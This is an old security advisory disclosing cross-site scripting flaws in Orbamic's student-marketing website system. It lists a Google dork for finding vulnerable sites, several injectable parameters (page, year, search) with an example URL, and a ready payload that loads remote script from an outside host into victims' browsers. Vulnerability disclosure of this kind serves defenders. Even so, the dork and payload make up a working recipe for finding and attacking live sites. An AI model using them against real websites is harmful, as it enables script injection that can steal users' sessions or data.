orbamic-xss.txt

`+==========================================================================================+  
+ Copyright 2004/2008 - Orbamic & XSS - Remote Java Inclusion +  
+==========================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: © 2008 BAM - Student Marketing • All rights reserved worldwide • developed by orbamic  
  
  
Web:http:www.sumarketing.co.uk  
  
Versions: all version  
  
Date: 01/10/2008  
  
  
Through SUMarketing.co.uk BAM are providing both clients and student organisations with   
outlets for marketing and advertising collaboration.  
  
No truer can be said than with BAM student marketing’s online student website system,   
which is in place to help University students unions develop their online services   
for their students from information and advice to fun.  
  
The BAM student website system offers a number of new and exciting online student marketing opportunities   
as well as developing key sectors   
within the students union such as Local part time student jobs, graduate marketing   
& post graduate recruitment through.....  
  
  
  
  
GOOGLE DORKS:  
------------  
  
"developed by orbamic"  
  
  
  
Parameters Affected:  
-------------------  
  
  
1-(From , querystring)  
  
page=insert-evil-remote-java.js  
  
  
2-(From querystring /calendar)  
  
year=insert-evil-remote-java.js ------------- > index.php?page=day&day=18&month=09&year=insert-evil-remote-java.js  
  
  
3-(From, Post)  
  
search=insert-evil-remote-java.js  
  
  
(and other parameters are affected.)  
  
  
Example insert insane code: "><script src=http://site/scripts/evil.js></script>   
  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+==========================================================================================+  
+ Copyright 2004/2008 - orbamic & XSS - Remote Java Inclusion +  
+==========================================================================================+`